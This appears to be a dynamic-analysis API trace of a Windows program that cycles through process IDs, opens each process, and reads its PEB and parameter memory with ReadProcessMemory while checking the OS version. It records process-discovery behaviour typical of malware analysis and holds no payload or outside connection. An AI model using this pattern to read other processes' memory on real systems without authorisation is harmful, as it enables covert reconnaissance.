[0404.835] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1226f0, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.836] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.837] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.837] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.838] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x121ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.838] malloc (_Size=0x6c) returned 0x2c4740
[0404.838] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x122754, lpBuffer=0x2c4740, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.838] free (_Block=0x2c4740)
[0404.839] CloseHandle (hObject=0x240) returned 1
[0404.840] _ui64tow (_Value=0x8a8, _Buffer="864", _Radix=10) returned="2216"
[0404.845] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2216") returned 4
[0404.847] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.847] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.869] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8a8) returned 0x240
[0404.869] GetLastError () returned 0x0
[0404.869] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.869] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.869] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.870] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x252930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.870] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2526ea, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.871] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.872] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.872] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.872] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x251ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.873] malloc (_Size=0x78) returned 0x2c4740
[0404.873] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x25275a, lpBuffer=0x2c4740, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.873] free (_Block=0x2c4740)
[0404.874] CloseHandle (hObject=0x240) returned 1
[0404.875] _ui64tow (_Value=0x8b4, _Buffer="2216", _Radix=10) returned="2228"
[0404.879] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2228") returned 4
[0404.881] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.881] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.903] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b4) returned 0x240
[0404.903] GetLastError () returned 0x0
[0404.903] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.903] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.903] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.904] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c28f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.904] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c26ea, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.905] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.906] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.906] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.907] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.907] malloc (_Size=0x62) returned 0x2c0800
[0404.907] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c2744, lpBuffer=0x2c0800, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0404.907] free (_Block=0x2c0800)
[0404.908] CloseHandle (hObject=0x240) returned 1
[0404.909] _ui64tow (_Value=0x8ec, _Buffer="2228", _Radix=10) returned="2284"
[0404.916] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2284") returned 4
[0404.918] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.918] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.942] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x240
[0404.942] GetLastError () returned 0x0
[0404.942] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.942] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.942] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.942] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b2940, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.943] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b26f6, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.944] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.945] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.946] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.946] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.946] malloc (_Size=0x78) returned 0x2c4740
[0404.946] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b2766, lpBuffer=0x2c4740, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.946] free (_Block=0x2c4740)
[0404.947] CloseHandle (hObject=0x240) returned 1
[0404.948] _ui64tow (_Value=0x918, _Buffer="2284", _Radix=10) returned="2328"
[0404.953] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2328") returned 4
[0404.954] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.954] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.018] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x918) returned 0x240
[0405.018] GetLastError () returned 0x0
[0405.018] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.018] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.018] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.019] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1029e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.019] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1027a0, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.020] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.050] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.050] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.050] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x101ef0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.051] malloc (_Size=0x78) returned 0x2c4740
[0405.051] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x102810, lpBuffer=0x2c4740, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.051] free (_Block=0x2c4740)
[0405.052] CloseHandle (hObject=0x240) returned 1
[0405.052] _ui64tow (_Value=0x920, _Buffer="2328", _Radix=10) returned="2336"
[0405.056] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2336") returned 4
[0405.057] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.057] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.103] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x920) returned 0x240
[0405.103] GetLastError () returned 0x0
[0405.103] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.103] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.103] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.103] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3e2940, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.104] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3e26fa, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.105] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.106] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.106] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.106] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3e1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.106] malloc (_Size=0x76) returned 0x2c4740
[0405.106] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3e2768, lpBuffer=0x2c4740, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.107] free (_Block=0x2c4740)
[0405.107] CloseHandle (hObject=0x240) returned 1
[0405.108] _ui64tow (_Value=0x928, _Buffer="2336", _Radix=10) returned="2344"
[0405.129] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2344") returned 4
[0405.130] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.130] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.154] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x928) returned 0x240
[0405.154] GetLastError () returned 0x0
[0405.154] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.154] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.154] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.155] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x442910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.155] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4426ee, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.156] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.157] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.157] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.158] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x441ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.158] malloc (_Size=0x6c) returned 0x2c4740
[0405.158] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x442752, lpBuffer=0x2c4740, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.158] free (_Block=0x2c4740)
[0405.159] CloseHandle (hObject=0x240) returned 1
[0405.160] _ui64tow (_Value=0x930, _Buffer="2344", _Radix=10) returned="2352"
[0405.165] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2352") returned 4
[0405.166] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.166] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x930) returned 0x240
[0405.190] GetLastError () returned 0x0
[0405.190] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.190] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.190] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.190] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2828c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.191] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2826e0, lpBuffer=0x12dd100, nSize=0x50, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.192] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.194] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.194] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.194] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x281ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.194] malloc (_Size=0x58) returned 0x2b99b0
[0405.194] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x282730, lpBuffer=0x2b99b0, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2b99b0*, lpNumberOfBytesRead=0x0) returned 1
[0405.195] free (_Block=0x2b99b0)
[0405.195] CloseHandle (hObject=0x240) returned 1
[0405.196] _ui64tow (_Value=0x938, _Buffer="2352", _Radix=10) returned="2360"
[0405.201] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2360") returned 4
[0405.202] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.202] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.230] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x938) returned 0x240
[0405.230] GetLastError () returned 0x0
[0405.230] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.230] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.230] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.231] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x372930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.231] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3726fa, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.232] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
